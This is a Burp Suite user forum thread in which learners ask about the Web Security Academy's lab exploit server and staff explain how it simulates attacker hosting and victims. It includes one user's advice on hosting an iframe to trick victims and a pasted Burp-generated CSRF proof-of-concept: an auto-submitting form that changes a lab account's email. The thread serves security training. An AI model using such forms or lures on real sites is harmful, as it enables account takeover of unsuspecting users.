Burp Suite User Forum

Create new post

Exploit Server

Miguel | Last updated: Oct 31, 2020 09:36PM UTC

good day. how can I set up a test exploit server or if there is any option online that can be used to test the http atacks part. Cheers...

Ben, PortSwigger Agent | Last updated: Nov 02, 2020 08:12AM UTC

Hi, Are you referring to the Exploit Server that is used in some of Web Academy labs?

Miguel | Last updated: Nov 02, 2020 10:01PM UTC

hello, yes. I used it in the host header atack labs where they provide us with an exploit server to capture cookies.

Ben, PortSwigger Agent | Last updated: Nov 03, 2020 08:53AM UTC

Hi, The Exploit Server is just something that we use in our Web Academy in order to make delivering exploits easier for the user. Some of the topics covered, for example, would require you to host exploits for victim users to access - we simulate this with the Exploit Server and dummy victim users.

David | Last updated: Dec 31, 2020 07:24PM UTC

Miguel - I realize you may have found that reply unhelpful, as did I. I searched for 30 minutes on HOW to access the exploit server. Finally saw it as a button at the top of the page when you are in 'activate lab'. hope this helps

mrloup98 | Last updated: Mar 02, 2021 10:08PM UTC

i cannot find it.can you help me please?

Ben, PortSwigger Agent | Last updated: Mar 03, 2021 08:16AM UTC

Hi, If the lab you are trying to solve involves the use of the Exploit Server then there will be an orange button at the top of the page to access the server once you have launched the lab.

arya | Last updated: Apr 10, 2021 10:51AM UTC

Hello PortSwigger, is it possible to draw a diagram on how the exploit server interact with client on labs such XSS https://portswigger.net/web-security/images/cross-site-scripting.svg?? thanks for the nice labs and materials. Mohammad

Michelle, PortSwigger Agent | Last updated: Apr 13, 2021 10:20AM UTC

There isn't anything special about the exploit server in this case and it's not specific to XSS. The browser just fetches the referenced script file like it would any other referenced resources e.g. images etc. The only difference is that the attacker has been able to point the reference to an external domain (like the exploit server) to trick the browser into loading a malicious resource rather than a legitimate/expected one. We're planning on producing some more content about web fundamentals like this in the future.

Miguel | Last updated: Jun 11, 2021 01:42AM UTC

Thanks averyone for the responses. Regards!!

Mayank | Last updated: Oct 12, 2021 05:48PM UTC

Hey, Can I use Exploit Server in real-world Bug Bounty Program to verify or Prove the finding (e.g:CSRF) Thanks

Michelle, PortSwigger Agent | Last updated: Oct 13, 2021 08:29AM UTC

The exploit server included with the labs is specifically for the Web Security Academy. If you wanted to use an exploit server in the real world you can setup your own server to host the exploits.

Md | Last updated: Nov 01, 2021 04:26AM UTC

Hi PortSwigger Team, Actually, I want to know the real-life scenario about your lab exploit server. What would we do if it didn't exist? I know It something, but I want to know more and more.

Ben, PortSwigger Agent | Last updated: Nov 01, 2021 08:35AM UTC

Hi, As noted above, you would need to create your own server that would be used to host your exploits. You would then also need some way of getting your 'victims' to access the exploits contained on your server. We simulate this process using the victim user and exploit server in our Web Academy so that you do not have to spend time creating these things - you can concentrate your time on actually learning about the vulnerabilities.

Imtiyaz | Last updated: Aug 02, 2022 06:04AM UTC

Is there any way through which we can setup our own server freely without any cost ?

Amit | Last updated: Mar 06, 2023 05:16AM UTC

I read above posts and I want to do as a victim and enter the credential and then attempt to attack. How to do it?

Amit | Last updated: Mar 06, 2023 05:16AM UTC

I read above posts and I want to do as a victim and enter the credential and then attempt to attack. How to do it?

Ben, PortSwigger Agent | Last updated: Mar 06, 2023 09:04AM UTC

Hi Amit, Are you able to explain what you are trying to do in a bit more detail so that we have a better understanding of what you are trying to achieve?

soid3t | Last updated: Apr 02, 2023 10:06AM UTC

so how do i actually inject similar iframe payload in the wild without this exploit server?

dashk4 | Last updated: Apr 02, 2023 08:22PM UTC

URL: https://exploit-0a83002b049f84e48148c50a01830012.exploit-server.net/exploit

dashk4 | Last updated: Apr 02, 2023 08:23PM UTC

heyo im here

cainesmckoy | Last updated: May 08, 2023 07:34PM UTC

@soid3t you would have to host a public webserver, on that webserver host the iframe then trick a user into browsing to your page unsuspectingly because it would apear to be a legit site, thus allowing your attack to run on a victim. I belive thats the kind of awnser you are looking for.

srinivas | Last updated: Sep 28, 2023 07:38AM UTC

This is your server. You can use the form below to save an exploit, and send it to the victim. Please note that the victim uses Google Chrome. When you test your exploit against yourself, we recommend using Burp's Browser or Chrome. please help

Ben, PortSwigger Agent | Last updated: Sep 28, 2023 08:43AM UTC

Hi Srinivas, Are you able to clarify what you need help with?

kaarthi | Last updated: Mar 11, 2024 04:34PM UTC

Hello! "This is your server. You can use the form below to save an exploit, and send it to the victim. Please note that the victim uses Google Chrome. When you test your exploit against yourself, we recommend using Burp's Browser or Chrome. " I'm getting the above line while exploiting the server, and coz of this I'm unable to solve my CSRF Vulnerability labs... Kindly let me know the steps to solve this issue

Ben, PortSwigger Agent | Last updated: Mar 11, 2024 05:52PM UTC

Hi Kaarthi, Are you able to clarify what you are trying to do? The text that you refer to is the standard text provided in the exploit server so should not impact the delivery of your exploit.

kaarthi | Last updated: Mar 12, 2024 08:58AM UTC

No I still get this issue... Actually when I'm trying to access the CSRF lab, even though my methodology is right I'm not able to submit the exploit. When I submit the request I can see the following: "This is your server. You can use the form below to save an exploit, and send it to the victim. Please note that the victim uses Google Chrome. When you test your exploit against yourself, we recommend using Burp's Browser or Chrome. " What does it mean? And how do I resolve it?

Ben, PortSwigger Agent | Last updated: Mar 12, 2024 09:27AM UTC

Hi Kaarthi, Are you able to send us an email at support@portswigger.net with some screenshots of what you are doing so that we can see this more clearly? When you deliver the exploit to the victim the exploit server page simply refreshes so you will continue to see the text. For some of these labs, simply delivering the correct exploit will solve the lab (and you will see this in the banner at the top of the page) for others there might be additional steps.

Megha | Last updated: Jul 10, 2024 05:58AM UTC

<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://0a1100d503627900822dc4d900a400d2.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="testing&#64;gmail&#46;com" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

Ben, PortSwigger Agent | Last updated: Jul 10, 2024 08:22AM UTC

Hi Megha, Are you having issues with this lab?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.